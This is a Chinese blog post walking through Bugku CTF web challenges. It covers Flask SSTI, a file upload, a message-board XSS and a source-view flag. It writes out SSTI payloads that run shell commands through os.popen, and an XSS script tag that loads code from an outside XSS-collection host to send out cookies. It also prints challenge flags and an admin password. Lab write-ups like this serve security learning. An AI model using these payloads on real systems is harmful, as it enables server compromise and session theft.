bugku攻略

已于 2024-07-30 22:56:15 修改
阅读量740 收藏 7
点赞数 16
文章标签: 安全
于 2024-07-30 22:52:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_68186313/article/details/140808765
版权

目录

第一关(Simple_SSTI_1)

第二关(Simple_SSTI_2)

第三关(Flask_FileUpload)

第四关(留言板)

第五关(滑稽)

第一关(Simple_SSTI_1)

查看源码,需要我们在flask里建立一个SECRET_KEY

直接访问URL+?flag={{ config.SECRET_KEY}}得到flag

输入flag

第二关(Simple_SSTI_2)

查看源码

ls查看目录

?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}

先查看"app"目录

?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}

发现flag,cat查看

?flag={{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}

输入flag

第三关(Flask_FileUpload)

查看源码

使用os.system函数执行操作系统命令,拓展名用.jpg

上传

上传成功

查看源码,发现flag

用cat查看flag

得到flag <!-- flag{e13116c6a0d47819c5a246330c444339} -->

输入flag

第四关(留言板)

扫描目录(由于已提交flag,这份是第二份IP的扫描目录)

复制配置代码

上传<sCRiPt sRC=//xs.pe/MJI></sCrIpT>

这里账号为admin 密码为011be4d65feac1a8

也可以输入“<script>alert(document.cookie)</script>”在页面弹出flag

”已有主机上线“,在cookie也有flag

输入flag

第五关(滑稽)

访问查看源码,得到flag(费眼QAQ)

<!--flag{a72c796cb88ed7fc69c8cba81046c531}-->

输入flag

第六关:(持续更新ing) 

浅秋沐玖
关注
  • 16
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web留言板
06-06
Web留言板 (0分) 设计一个简单的基于Web的留言板,要求如下:1)系统中所有页面,如果用户没登录,则让用户返回到登录页面login.jsp(说明:login.jsp页面填写用户的用户名和密码);2)留言板(message.jsp)页面中以表格的形式(留言者用户名、留言标题、留言时间)显示出所有的用户留言,点击一个标题后,可以在新页面(showmessage.jsp)中显示留言的内容;3)在留言页面addMessage.jsp可以添加新的留言。留言包括:标题、内容。 说明:(1)采用JSP+JavaBean结构;(2)所有的留言内容需要存储到文件。
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip
12-07
【标题】"BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip" 指的是2021年BugKu网络安全平台举办的AWD(Attack-Defend,攻防)CTF(Capture The Flag,夺旗)排位赛的实战题目,其中的"7"可能代表该赛事的第七个...
【愚公系列】2023年06月 Bugku-Web(留言板
时光隧道
06-23 7033
使用dirsearch进行目录爆破的步骤如下:下载dirsearch工具:可以从Github上下载dirsearch,或者使用命令行工具进行安装。打开dirsearch工具:在命令行中输入python3 dirsearch.py命令,即可打开dirsearch工具。设置目标URL:在命令行中输入目标URL,例如:python3 dirsearch.py -u http://example.com。
bugku-web-留言板
m0_57954651的博客
10-31 4999
获取cookie的js代码 (alert(document.cookie))
Bugku Web专项(持续更新)
最新发布
weixin_69065643的博客
07-30 365
点击网址访问网址,他让我们输入一个flag参数我们查看页面源代码他告诉我们有经常设置secret_key 变量可以知道要传入一个名为flag的参数,又说我们经常设置一个secret_key我们传入参数 /?得到flag进入网址和第一关一样,让我们输入一个flag参数,查看页面源代码没有什么有用的信息,我们看一下config。
BUGKU 留言板
热门推荐
qq_56313338的博客
07-22 2万+
bugku 留言板的解题思路 web
Bugku-留言板
qq_56611811的博客
05-07 821
1.提示我们用xss平台接收flag2.通过xss.pt平台生成脚本,以插入图片形式将图片地址上传 3.回到xss平台可以看到接收到flag4.URL解码一下,拿到flag
BugKu:留言板
m0_63944205的博客
07-30 225
看到输入框我们首先想到可能是sql注入或者是xss注入。
BUGKU-WEB 留言板
天泽岁月
02-07 1287
BUGKU-WEB 留言板
bugku《1和0的故事.txt》
07-24
大佬可以试试
BugKu杂项QAQ反编译完整版
07-21
"BugKu杂项QAQ反编译完整版"是指针对BugKu平台上的一个MISC(Miscellaneous)类问题,该问题涉及到一个名为"QAQ"的挑战,可能是一个编程或解谜类型的题目。由于在线反编译工具可能无法提供完整的结果,这里提供了一...
bugku杂项题writeup
11-22
bugku杂项题writeup
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
BUGKU-WEB 留言板1
天泽岁月
02-18 1359
BUGKU-WEB 留言板1,xss双写绕过
留言板
weixin_53150482的博客
08-08 1634
留言板
Bugku-web-留言板
qq_68457525的博客
06-20 380
ctf中关于xss跨站脚本漏洞的学习
ctf bugku
weixin_51387754的博客
08-13 2180
bugkuSimple_SSTI_1社工-进阶收集Simple_SSTI_2Flask_FileUpload1和0的故事easy_nbt留言板瑞士军刀入门逆向滑稽canarytelnet眼见非实啊哒/.-聪明的小羊ok[+-<>] Simple_SSTI_1 查看源码 You need pass in a parameter named flag。 You know, in the flask, We often set a secret_key variable 您需要传入一个名为flag
Bugku——web
chongya927的博客
03-05 1462
菜鸟学习CTF之路
bugku题目的wp
zbbjya的博客
04-01 381
web 源代码 打开我输入的是 127.0.0.1 输入之后发现没有用 然后查看源代码我们会发现有些不一样的东西 有这个var1和var2 并且后面有eval(unescape(p1) + unescape(’%35%34%61%61%32’ + p2)); eval 是执行语句说明可能需要这样构造将可执行的语句获取出来 我们仔细看一下这个编码是url编码直接在hackbar里面就可以解 根据提示将其组合起来然后解密 %66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%5
bugku sodirty
09-03
Bugku sodirty是一个题目,具体的解题过程可以在记录解题过程的介绍中找到。[1] 该题目可能涉及到PHP代码审计、MD5碰撞、比较绕过等内容。而在解题过程中,可能还会用到一些其他的题目和技术,如pwn3、pwn5、短标签绕过echo、eval代码注入漏洞、$$绕过特定字符限制等。 关于具体解题的详细步骤和方法,可以参考解题过程中的记录。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [Bugku解题 web 【四】](https://blog.csdn.net/weixin_46703850/article/details/115184847)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [bugku pwn libc](https://download.csdn.net/download/kety_gz/11656088)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值